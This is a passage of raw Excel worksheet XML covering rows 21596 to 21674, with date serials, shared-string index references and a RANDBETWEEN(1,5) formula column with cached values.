      <c r="A21596" s="1">
        <v>43073.598032407404</v>
      </c>
      <c r="C21596" t="s">
        <v>10</v>
      </c>
      <c r="D21596" t="s">
        <v>39</v>
      </c>
      <c r="E21596" s="2" t="s">
        <v>19468</v>
      </c>
      <c r="F21596">
        <f t="shared" ca="1" si="337"/>
        <v>3</v>
      </c>
    </row>
    <row r="21597" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21597" s="1">
        <v>43073.588888888888</v>
      </c>
      <c r="C21597" t="s">
        <v>10</v>
      </c>
      <c r="D21597" t="s">
        <v>33</v>
      </c>
      <c r="E21597" t="s">
        <v>19469</v>
      </c>
      <c r="F21597">
        <f t="shared" ca="1" si="337"/>
        <v>1</v>
      </c>
    </row>
    <row r="21598" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21598" s="1">
        <v>43073.582662037035</v>
      </c>
      <c r="C21598" t="s">
        <v>260</v>
      </c>
      <c r="E21598" s="2" t="s">
        <v>19470</v>
      </c>
      <c r="F21598">
        <f t="shared" ca="1" si="337"/>
        <v>2</v>
      </c>
    </row>
    <row r="21599" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21599" s="1">
        <v>43073.56082175926</v>
      </c>
      <c r="C21599" t="s">
        <v>178</v>
      </c>
      <c r="E21599" t="s">
        <v>19471</v>
      </c>
      <c r="F21599">
        <f t="shared" ca="1" si="337"/>
        <v>4</v>
      </c>
    </row>
    <row r="21600" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21600" s="1">
        <v>43073.548136574071</v>
      </c>
      <c r="C21600" t="s">
        <v>10</v>
      </c>
      <c r="D21600" t="s">
        <v>20</v>
      </c>
      <c r="E21600" t="s">
        <v>19472</v>
      </c>
      <c r="F21600">
        <f t="shared" ca="1" si="337"/>
        <v>3</v>
      </c>
    </row>
    <row r="21601" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21601" s="1">
        <v>43073.514085648145</v>
      </c>
      <c r="C21601" t="s">
        <v>6</v>
      </c>
      <c r="D21601" t="s">
        <v>821</v>
      </c>
      <c r="E21601" t="s">
        <v>19473</v>
      </c>
      <c r="F21601">
        <f t="shared" ca="1" si="337"/>
        <v>2</v>
      </c>
    </row>
    <row r="21602" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21602" s="1">
        <v>43073.508437500001</v>
      </c>
      <c r="C21602" t="s">
        <v>1325</v>
      </c>
      <c r="E21602" s="2" t="s">
        <v>19474</v>
      </c>
      <c r="F21602">
        <f t="shared" ca="1" si="337"/>
        <v>5</v>
      </c>
    </row>
    <row r="21603" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21603" s="1">
        <v>43073.501458333332</v>
      </c>
      <c r="C21603" t="s">
        <v>41</v>
      </c>
      <c r="E21603" t="s">
        <v>19475</v>
      </c>
      <c r="F21603">
        <f t="shared" ca="1" si="337"/>
        <v>3</v>
      </c>
    </row>
    <row r="21604" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A21604" s="1">
        <v>43073.500439814816</v>
      </c>
      <c r="C21604" t="s">
        <v>10</v>
      </c>
      <c r="D21604" t="s">
        <v>330</v>
      </c>
      <c r="E21604" s="2" t="s">
        <v>19476</v>
      </c>
      <c r="F21604">
        <f t="shared" ca="1" si="337"/>
        <v>1</v>
      </c>
    </row>
    <row r="21605" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21605" s="1">
        <v>43073.488113425927</v>
      </c>
      <c r="C21605" t="s">
        <v>623</v>
      </c>
      <c r="E21605" t="s">
        <v>19477</v>
      </c>
      <c r="F21605">
        <f t="shared" ca="1" si="337"/>
        <v>3</v>
      </c>
    </row>
    <row r="21606" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21606" s="1">
        <v>43073.468773148146</v>
      </c>
      <c r="C21606" t="s">
        <v>10</v>
      </c>
      <c r="D21606" t="s">
        <v>36</v>
      </c>
      <c r="E21606" t="s">
        <v>19478</v>
      </c>
      <c r="F21606">
        <f t="shared" ca="1" si="337"/>
        <v>3</v>
      </c>
    </row>
    <row r="21607" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21607" s="1">
        <v>43073.441365740742</v>
      </c>
      <c r="C21607" t="s">
        <v>103</v>
      </c>
      <c r="F21607">
        <f t="shared" ca="1" si="337"/>
        <v>3</v>
      </c>
    </row>
    <row r="21608" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21608" s="1">
        <v>43073.439236111109</v>
      </c>
      <c r="C21608" t="s">
        <v>10</v>
      </c>
      <c r="D21608" t="s">
        <v>178</v>
      </c>
      <c r="E21608" t="s">
        <v>19479</v>
      </c>
      <c r="F21608">
        <f t="shared" ca="1" si="337"/>
        <v>2</v>
      </c>
    </row>
    <row r="21609" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A21609" s="1">
        <v>43073.433379629627</v>
      </c>
      <c r="C21609" t="s">
        <v>48</v>
      </c>
      <c r="E21609" s="2" t="s">
        <v>19480</v>
      </c>
      <c r="F21609">
        <f t="shared" ca="1" si="337"/>
        <v>5</v>
      </c>
    </row>
    <row r="21610" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21610" s="1">
        <v>43073.425335648149</v>
      </c>
      <c r="C21610" t="s">
        <v>6</v>
      </c>
      <c r="D21610" t="s">
        <v>2139</v>
      </c>
      <c r="E21610" s="2" t="s">
        <v>19481</v>
      </c>
      <c r="F21610">
        <f t="shared" ca="1" si="337"/>
        <v>3</v>
      </c>
    </row>
    <row r="21611" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21611" s="1">
        <v>43073.41983796296</v>
      </c>
      <c r="C21611" t="s">
        <v>10</v>
      </c>
      <c r="D21611" t="s">
        <v>158</v>
      </c>
      <c r="E21611" t="s">
        <v>19482</v>
      </c>
      <c r="F21611">
        <f t="shared" ca="1" si="337"/>
        <v>1</v>
      </c>
    </row>
    <row r="21612" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21612" s="1">
        <v>43073.390520833331</v>
      </c>
      <c r="C21612" t="s">
        <v>60</v>
      </c>
      <c r="E21612" t="s">
        <v>19483</v>
      </c>
      <c r="F21612">
        <f t="shared" ca="1" si="337"/>
        <v>3</v>
      </c>
    </row>
    <row r="21613" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A21613" s="1">
        <v>43073.386620370373</v>
      </c>
      <c r="C21613" t="s">
        <v>6</v>
      </c>
      <c r="D21613" t="s">
        <v>25</v>
      </c>
      <c r="E21613" s="2" t="s">
        <v>19484</v>
      </c>
      <c r="F21613">
        <f t="shared" ca="1" si="337"/>
        <v>2</v>
      </c>
    </row>
    <row r="21614" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21614" s="1">
        <v>43073.384386574071</v>
      </c>
      <c r="C21614" t="s">
        <v>16</v>
      </c>
      <c r="E21614" t="s">
        <v>19485</v>
      </c>
      <c r="F21614">
        <f t="shared" ca="1" si="337"/>
        <v>5</v>
      </c>
    </row>
    <row r="21615" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21615" s="1">
        <v>43073.362060185187</v>
      </c>
      <c r="C21615" t="s">
        <v>48</v>
      </c>
      <c r="E21615" s="2" t="s">
        <v>19486</v>
      </c>
      <c r="F21615">
        <f t="shared" ca="1" si="337"/>
        <v>5</v>
      </c>
    </row>
    <row r="21616" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A21616" s="1">
        <v>43073.355798611112</v>
      </c>
      <c r="C21616" t="s">
        <v>907</v>
      </c>
      <c r="E21616" s="2" t="s">
        <v>19487</v>
      </c>
      <c r="F21616">
        <f t="shared" ca="1" si="337"/>
        <v>3</v>
      </c>
    </row>
    <row r="21617" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21617" s="1">
        <v>43073.355462962965</v>
      </c>
      <c r="C21617" t="s">
        <v>10</v>
      </c>
      <c r="D21617" t="s">
        <v>89</v>
      </c>
      <c r="E21617" s="2" t="s">
        <v>19488</v>
      </c>
      <c r="F21617">
        <f t="shared" ca="1" si="337"/>
        <v>5</v>
      </c>
    </row>
    <row r="21618" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21618" s="1">
        <v>43073.334641203706</v>
      </c>
      <c r="C21618" t="s">
        <v>71</v>
      </c>
      <c r="E21618" t="s">
        <v>19489</v>
      </c>
      <c r="F21618">
        <f t="shared" ca="1" si="337"/>
        <v>2</v>
      </c>
    </row>
    <row r="21619" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21619" s="1">
        <v>43073.292291666665</v>
      </c>
      <c r="C21619" t="s">
        <v>48</v>
      </c>
      <c r="E21619" s="2" t="s">
        <v>19490</v>
      </c>
      <c r="F21619">
        <f t="shared" ca="1" si="337"/>
        <v>1</v>
      </c>
    </row>
    <row r="21620" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21620" s="1">
        <v>43073.250243055554</v>
      </c>
      <c r="C21620" t="s">
        <v>10</v>
      </c>
      <c r="D21620" t="s">
        <v>817</v>
      </c>
      <c r="E21620" t="s">
        <v>19491</v>
      </c>
      <c r="F21620">
        <f t="shared" ca="1" si="337"/>
        <v>3</v>
      </c>
    </row>
    <row r="21621" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21621" s="1">
        <v>43073.224791666667</v>
      </c>
      <c r="C21621" t="s">
        <v>41</v>
      </c>
      <c r="E21621" t="s">
        <v>19492</v>
      </c>
      <c r="F21621">
        <f t="shared" ca="1" si="337"/>
        <v>5</v>
      </c>
    </row>
    <row r="21622" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21622" s="1">
        <v>43073.214930555558</v>
      </c>
      <c r="C21622" t="s">
        <v>71</v>
      </c>
      <c r="E21622" s="2" t="s">
        <v>19493</v>
      </c>
      <c r="F21622">
        <f t="shared" ca="1" si="337"/>
        <v>5</v>
      </c>
    </row>
    <row r="21623" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21623" s="1">
        <v>43073.185254629629</v>
      </c>
      <c r="C21623" t="s">
        <v>103</v>
      </c>
      <c r="E21623" s="2" t="s">
        <v>19494</v>
      </c>
      <c r="F21623">
        <f t="shared" ca="1" si="337"/>
        <v>2</v>
      </c>
    </row>
    <row r="21624" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A21624" s="1">
        <v>43073.143113425926</v>
      </c>
      <c r="C21624" t="s">
        <v>71</v>
      </c>
      <c r="E21624" s="2" t="s">
        <v>19495</v>
      </c>
      <c r="F21624">
        <f t="shared" ca="1" si="337"/>
        <v>3</v>
      </c>
    </row>
    <row r="21625" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21625" s="1">
        <v>43073.142025462963</v>
      </c>
      <c r="C21625" t="s">
        <v>6</v>
      </c>
      <c r="D21625" t="s">
        <v>114</v>
      </c>
      <c r="E21625" t="s">
        <v>19496</v>
      </c>
      <c r="F21625">
        <f t="shared" ca="1" si="337"/>
        <v>4</v>
      </c>
    </row>
    <row r="21626" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21626" s="1">
        <v>43073.074942129628</v>
      </c>
      <c r="C21626" t="s">
        <v>314</v>
      </c>
      <c r="E21626" t="s">
        <v>19497</v>
      </c>
      <c r="F21626">
        <f t="shared" ca="1" si="337"/>
        <v>3</v>
      </c>
    </row>
    <row r="21627" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21627" s="1">
        <v>43073.067361111112</v>
      </c>
      <c r="C21627" t="s">
        <v>301</v>
      </c>
      <c r="E21627" s="2" t="s">
        <v>19498</v>
      </c>
      <c r="F21627">
        <f t="shared" ca="1" si="337"/>
        <v>1</v>
      </c>
    </row>
    <row r="21628" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A21628" s="1">
        <v>43073.053865740738</v>
      </c>
      <c r="C21628" t="s">
        <v>10</v>
      </c>
      <c r="D21628" t="s">
        <v>36</v>
      </c>
      <c r="E21628" s="2" t="s">
        <v>19499</v>
      </c>
      <c r="F21628">
        <f t="shared" ca="1" si="337"/>
        <v>1</v>
      </c>
    </row>
    <row r="21629" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A21629" s="1">
        <v>43073.033900462964</v>
      </c>
      <c r="C21629" t="s">
        <v>4500</v>
      </c>
      <c r="E21629" s="2" t="s">
        <v>19500</v>
      </c>
      <c r="F21629">
        <f t="shared" ca="1" si="337"/>
        <v>4</v>
      </c>
    </row>
    <row r="21630" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21630" s="1">
        <v>43073.026192129626</v>
      </c>
      <c r="C21630" t="s">
        <v>41</v>
      </c>
      <c r="E21630" s="2" t="s">
        <v>19501</v>
      </c>
      <c r="F21630">
        <f t="shared" ca="1" si="337"/>
        <v>5</v>
      </c>
    </row>
    <row r="21631" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21631" s="1">
        <v>43072.652627314812</v>
      </c>
      <c r="C21631" t="s">
        <v>2144</v>
      </c>
      <c r="E21631" s="2" t="s">
        <v>19502</v>
      </c>
      <c r="F21631">
        <f t="shared" ca="1" si="337"/>
        <v>3</v>
      </c>
    </row>
    <row r="21632" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21632" s="1">
        <v>43072.512673611112</v>
      </c>
      <c r="C21632" t="s">
        <v>454</v>
      </c>
      <c r="D21632" t="s">
        <v>1036</v>
      </c>
      <c r="E21632" s="2" t="s">
        <v>19503</v>
      </c>
      <c r="F21632">
        <f t="shared" ca="1" si="337"/>
        <v>4</v>
      </c>
    </row>
    <row r="21633" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21633" s="1">
        <v>43072.336481481485</v>
      </c>
      <c r="C21633" t="s">
        <v>41</v>
      </c>
      <c r="E21633" t="s">
        <v>19504</v>
      </c>
      <c r="F21633">
        <f t="shared" ca="1" si="337"/>
        <v>5</v>
      </c>
    </row>
    <row r="21634" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21634" s="1">
        <v>43071.951493055552</v>
      </c>
      <c r="C21634" t="s">
        <v>139</v>
      </c>
      <c r="D21634" t="s">
        <v>312</v>
      </c>
      <c r="E21634" s="2" t="s">
        <v>19505</v>
      </c>
      <c r="F21634">
        <f t="shared" ref="F21634:F21697" ca="1" si="338">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="21635" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A21635" s="1">
        <v>43071.908993055556</v>
      </c>
      <c r="C21635" t="s">
        <v>4963</v>
      </c>
      <c r="D21635" t="s">
        <v>1993</v>
      </c>
      <c r="E21635" s="2" t="s">
        <v>19506</v>
      </c>
      <c r="F21635">
        <f t="shared" ca="1" si="338"/>
        <v>5</v>
      </c>
    </row>
    <row r="21636" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21636" s="1">
        <v>43071.616006944445</v>
      </c>
      <c r="C21636" t="s">
        <v>173</v>
      </c>
      <c r="E21636" s="2" t="s">
        <v>19507</v>
      </c>
      <c r="F21636">
        <f t="shared" ca="1" si="338"/>
        <v>1</v>
      </c>
    </row>
    <row r="21637" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21637" s="1">
        <v>43071.517928240741</v>
      </c>
      <c r="C21637" t="s">
        <v>41</v>
      </c>
      <c r="E21637" t="s">
        <v>19508</v>
      </c>
      <c r="F21637">
        <f t="shared" ca="1" si="338"/>
        <v>1</v>
      </c>
    </row>
    <row r="21638" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A21638" s="1">
        <v>43071.154224537036</v>
      </c>
      <c r="C21638" t="s">
        <v>197</v>
      </c>
      <c r="E21638" s="2" t="s">
        <v>19509</v>
      </c>
      <c r="F21638">
        <f t="shared" ca="1" si="338"/>
        <v>3</v>
      </c>
    </row>
    <row r="21639" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A21639" s="1">
        <v>43071.113159722219</v>
      </c>
      <c r="C21639" t="s">
        <v>73</v>
      </c>
      <c r="E21639" s="2" t="s">
        <v>19510</v>
      </c>
      <c r="F21639">
        <f t="shared" ca="1" si="338"/>
        <v>2</v>
      </c>
    </row>
    <row r="21640" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21640" s="1">
        <v>43071.098043981481</v>
      </c>
      <c r="C21640" t="s">
        <v>1194</v>
      </c>
      <c r="D21640" t="s">
        <v>25</v>
      </c>
      <c r="E21640" s="2" t="s">
        <v>19511</v>
      </c>
      <c r="F21640">
        <f t="shared" ca="1" si="338"/>
        <v>3</v>
      </c>
    </row>
    <row r="21641" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21641" s="1">
        <v>43070.997187499997</v>
      </c>
      <c r="C21641" t="s">
        <v>67</v>
      </c>
      <c r="D21641" t="s">
        <v>112</v>
      </c>
      <c r="E21641" t="s">
        <v>19512</v>
      </c>
      <c r="F21641">
        <f t="shared" ca="1" si="338"/>
        <v>5</v>
      </c>
    </row>
    <row r="21642" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21642" s="1">
        <v>43070.800254629627</v>
      </c>
      <c r="C21642" t="s">
        <v>10</v>
      </c>
      <c r="D21642" t="s">
        <v>86</v>
      </c>
      <c r="E21642" t="s">
        <v>19513</v>
      </c>
      <c r="F21642">
        <f t="shared" ca="1" si="338"/>
        <v>1</v>
      </c>
    </row>
    <row r="21643" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21643" s="1">
        <v>43070.712766203702</v>
      </c>
      <c r="C21643" t="s">
        <v>10</v>
      </c>
      <c r="D21643" t="s">
        <v>6</v>
      </c>
      <c r="E21643" t="s">
        <v>19514</v>
      </c>
      <c r="F21643">
        <f t="shared" ca="1" si="338"/>
        <v>1</v>
      </c>
    </row>
    <row r="21644" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A21644" s="1">
        <v>43070.689895833333</v>
      </c>
      <c r="C21644" t="s">
        <v>6</v>
      </c>
      <c r="D21644" t="s">
        <v>194</v>
      </c>
      <c r="E21644" s="2" t="s">
        <v>19515</v>
      </c>
      <c r="F21644">
        <f t="shared" ca="1" si="338"/>
        <v>5</v>
      </c>
    </row>
    <row r="21645" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21645" s="1">
        <v>43070.645798611113</v>
      </c>
      <c r="C21645" t="s">
        <v>10</v>
      </c>
      <c r="D21645" t="s">
        <v>89</v>
      </c>
      <c r="E21645" t="s">
        <v>19516</v>
      </c>
      <c r="F21645">
        <f t="shared" ca="1" si="338"/>
        <v>2</v>
      </c>
    </row>
    <row r="21646" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21646" s="1">
        <v>43070.637256944443</v>
      </c>
      <c r="C21646" t="s">
        <v>10</v>
      </c>
      <c r="D21646" t="s">
        <v>41</v>
      </c>
      <c r="E21646" t="s">
        <v>19517</v>
      </c>
      <c r="F21646">
        <f t="shared" ca="1" si="338"/>
        <v>3</v>
      </c>
    </row>
    <row r="21647" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21647" s="1">
        <v>43070.622511574074</v>
      </c>
      <c r="C21647" t="s">
        <v>10</v>
      </c>
      <c r="D21647" t="s">
        <v>1056</v>
      </c>
      <c r="E21647" s="2" t="s">
        <v>19518</v>
      </c>
      <c r="F21647">
        <f t="shared" ca="1" si="338"/>
        <v>4</v>
      </c>
    </row>
    <row r="21648" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21648" s="1">
        <v>43070.581921296296</v>
      </c>
      <c r="C21648" t="s">
        <v>10</v>
      </c>
      <c r="D21648" t="s">
        <v>6</v>
      </c>
      <c r="E21648" t="s">
        <v>19519</v>
      </c>
      <c r="F21648">
        <f t="shared" ca="1" si="338"/>
        <v>5</v>
      </c>
    </row>
    <row r="21649" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21649" s="1">
        <v>43070.581643518519</v>
      </c>
      <c r="C21649" t="s">
        <v>222</v>
      </c>
      <c r="E21649" s="2" t="s">
        <v>19520</v>
      </c>
      <c r="F21649">
        <f t="shared" ca="1" si="338"/>
        <v>5</v>
      </c>
    </row>
    <row r="21650" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21650" s="1">
        <v>43070.546701388892</v>
      </c>
      <c r="C21650" t="s">
        <v>10</v>
      </c>
      <c r="D21650" t="s">
        <v>46</v>
      </c>
      <c r="E21650" t="s">
        <v>19521</v>
      </c>
      <c r="F21650">
        <f t="shared" ca="1" si="338"/>
        <v>5</v>
      </c>
    </row>
    <row r="21651" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A21651" s="1">
        <v>43070.532650462963</v>
      </c>
      <c r="C21651" t="s">
        <v>10</v>
      </c>
      <c r="D21651" t="s">
        <v>6</v>
      </c>
      <c r="E21651" s="2" t="s">
        <v>19522</v>
      </c>
      <c r="F21651">
        <f t="shared" ca="1" si="338"/>
        <v>3</v>
      </c>
    </row>
    <row r="21652" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21652" s="1">
        <v>43070.531851851854</v>
      </c>
      <c r="C21652" t="s">
        <v>10</v>
      </c>
      <c r="D21652" t="s">
        <v>6</v>
      </c>
      <c r="E21652" t="s">
        <v>19523</v>
      </c>
      <c r="F21652">
        <f t="shared" ca="1" si="338"/>
        <v>2</v>
      </c>
    </row>
    <row r="21653" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A21653" s="1">
        <v>43070.527905092589</v>
      </c>
      <c r="C21653" t="s">
        <v>10</v>
      </c>
      <c r="D21653" t="s">
        <v>6</v>
      </c>
      <c r="E21653" s="2" t="s">
        <v>19524</v>
      </c>
      <c r="F21653">
        <f t="shared" ca="1" si="338"/>
        <v>4</v>
      </c>
    </row>
    <row r="21654" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21654" s="1">
        <v>43070.520844907405</v>
      </c>
      <c r="C21654" t="s">
        <v>10</v>
      </c>
      <c r="D21654" t="s">
        <v>107</v>
      </c>
      <c r="E21654" t="s">
        <v>19525</v>
      </c>
      <c r="F21654">
        <f t="shared" ca="1" si="338"/>
        <v>3</v>
      </c>
    </row>
    <row r="21655" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21655" s="1">
        <v>43070.501076388886</v>
      </c>
      <c r="C21655" t="s">
        <v>10</v>
      </c>
      <c r="D21655" t="s">
        <v>23</v>
      </c>
      <c r="E21655" s="2" t="s">
        <v>19526</v>
      </c>
      <c r="F21655">
        <f t="shared" ca="1" si="338"/>
        <v>1</v>
      </c>
    </row>
    <row r="21656" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21656" s="1">
        <v>43070.499699074076</v>
      </c>
      <c r="C21656" t="s">
        <v>41</v>
      </c>
      <c r="E21656" t="s">
        <v>19527</v>
      </c>
      <c r="F21656">
        <f t="shared" ca="1" si="338"/>
        <v>1</v>
      </c>
    </row>
    <row r="21657" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21657" s="1">
        <v>43070.485729166663</v>
      </c>
      <c r="C21657" t="s">
        <v>48</v>
      </c>
      <c r="E21657" s="2" t="s">
        <v>19528</v>
      </c>
      <c r="F21657">
        <f t="shared" ca="1" si="338"/>
        <v>2</v>
      </c>
    </row>
    <row r="21658" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A21658" s="1">
        <v>43070.477418981478</v>
      </c>
      <c r="C21658" t="s">
        <v>454</v>
      </c>
      <c r="D21658" t="s">
        <v>1993</v>
      </c>
      <c r="E21658" s="2" t="s">
        <v>19529</v>
      </c>
      <c r="F21658">
        <f t="shared" ca="1" si="338"/>
        <v>2</v>
      </c>
    </row>
    <row r="21659" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21659" s="1">
        <v>43070.444502314815</v>
      </c>
      <c r="C21659" t="s">
        <v>10</v>
      </c>
      <c r="D21659" t="s">
        <v>36</v>
      </c>
      <c r="E21659" t="s">
        <v>19530</v>
      </c>
      <c r="F21659">
        <f t="shared" ca="1" si="338"/>
        <v>2</v>
      </c>
    </row>
    <row r="21660" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A21660" s="1">
        <v>43070.410046296296</v>
      </c>
      <c r="C21660" t="s">
        <v>10</v>
      </c>
      <c r="D21660" t="s">
        <v>330</v>
      </c>
      <c r="E21660" s="2" t="s">
        <v>19531</v>
      </c>
      <c r="F21660">
        <f t="shared" ca="1" si="338"/>
        <v>4</v>
      </c>
    </row>
    <row r="21661" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21661" s="1">
        <v>43070.383252314816</v>
      </c>
      <c r="C21661" t="s">
        <v>6</v>
      </c>
      <c r="D21661" t="s">
        <v>25</v>
      </c>
      <c r="E21661" s="2" t="s">
        <v>19532</v>
      </c>
      <c r="F21661">
        <f t="shared" ca="1" si="338"/>
        <v>3</v>
      </c>
    </row>
    <row r="21662" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A21662" s="1">
        <v>43070.378125000003</v>
      </c>
      <c r="C21662" t="s">
        <v>71</v>
      </c>
      <c r="D21662" t="s">
        <v>312</v>
      </c>
      <c r="E21662" s="2" t="s">
        <v>19533</v>
      </c>
      <c r="F21662">
        <f t="shared" ca="1" si="338"/>
        <v>1</v>
      </c>
    </row>
    <row r="21663" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21663" s="1">
        <v>43070.372488425928</v>
      </c>
      <c r="C21663" t="s">
        <v>10</v>
      </c>
      <c r="D21663" t="s">
        <v>52</v>
      </c>
      <c r="E21663" t="s">
        <v>19534</v>
      </c>
      <c r="F21663">
        <f t="shared" ca="1" si="338"/>
        <v>4</v>
      </c>
    </row>
    <row r="21664" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A21664" s="1">
        <v>43070.356342592589</v>
      </c>
      <c r="C21664" t="s">
        <v>65</v>
      </c>
      <c r="E21664" s="2" t="s">
        <v>19535</v>
      </c>
      <c r="F21664">
        <f t="shared" ca="1" si="338"/>
        <v>3</v>
      </c>
    </row>
    <row r="21665" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A21665" s="1">
        <v>43070.320324074077</v>
      </c>
      <c r="C21665" t="s">
        <v>1325</v>
      </c>
      <c r="E21665" s="2" t="s">
        <v>19536</v>
      </c>
      <c r="F21665">
        <f t="shared" ca="1" si="338"/>
        <v>2</v>
      </c>
    </row>
    <row r="21666" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A21666" s="1">
        <v>43070.300995370373</v>
      </c>
      <c r="C21666" t="s">
        <v>10</v>
      </c>
      <c r="D21666" t="s">
        <v>89</v>
      </c>
      <c r="E21666" s="2" t="s">
        <v>19537</v>
      </c>
      <c r="F21666">
        <f t="shared" ca="1" si="338"/>
        <v>4</v>
      </c>
    </row>
    <row r="21667" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A21667" s="1">
        <v>43070.223298611112</v>
      </c>
      <c r="C21667" t="s">
        <v>73</v>
      </c>
      <c r="E21667" s="2" t="s">
        <v>19538</v>
      </c>
      <c r="F21667">
        <f t="shared" ca="1" si="338"/>
        <v>4</v>
      </c>
    </row>
    <row r="21668" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21668" s="1">
        <v>43070.222986111112</v>
      </c>
      <c r="C21668" t="s">
        <v>845</v>
      </c>
      <c r="E21668" s="2" t="s">
        <v>19539</v>
      </c>
      <c r="F21668">
        <f t="shared" ca="1" si="338"/>
        <v>4</v>
      </c>
    </row>
    <row r="21669" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A21669" s="1">
        <v>43070.206967592596</v>
      </c>
      <c r="C21669" t="s">
        <v>41</v>
      </c>
      <c r="E21669" s="2" t="s">
        <v>19540</v>
      </c>
      <c r="F21669">
        <f t="shared" ca="1" si="338"/>
        <v>2</v>
      </c>
    </row>
    <row r="21670" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21670" s="1">
        <v>43070.20239583333</v>
      </c>
      <c r="C21670" t="s">
        <v>65</v>
      </c>
      <c r="E21670" s="2" t="s">
        <v>19541</v>
      </c>
      <c r="F21670">
        <f t="shared" ca="1" si="338"/>
        <v>4</v>
      </c>
    </row>
    <row r="21671" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21671" s="1">
        <v>43070.173680555556</v>
      </c>
      <c r="C21671" t="s">
        <v>430</v>
      </c>
      <c r="E21671" s="2" t="s">
        <v>19542</v>
      </c>
      <c r="F21671">
        <f t="shared" ca="1" si="338"/>
        <v>3</v>
      </c>
    </row>
    <row r="21672" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A21672" s="1">
        <v>43070.16505787037</v>
      </c>
      <c r="C21672" t="s">
        <v>10</v>
      </c>
      <c r="D21672" t="s">
        <v>36</v>
      </c>
      <c r="E21672" s="2" t="s">
        <v>19543</v>
      </c>
      <c r="F21672">
        <f t="shared" ca="1" si="338"/>
        <v>5</v>
      </c>
    </row>
    <row r="21673" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21673" s="1">
        <v>43070.092430555553</v>
      </c>
      <c r="C21673" t="s">
        <v>71</v>
      </c>
      <c r="E21673" t="s">
        <v>19544</v>
      </c>
      <c r="F21673">
        <f t="shared" ca="1" si="338"/>
        <v>1</v>
      </c>
    </row>
    <row r="21674" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21674" s="1">
        <v>43069.951574074075</v>
      </c>
      <c r="C21674" t="s">
        <v>41</v>
      </c>
      <c r="E21674" t="s">
        <v>19545</v>
      </c>
      <c r="F21674">
        <f t="shared" ca="1" si="338"/>
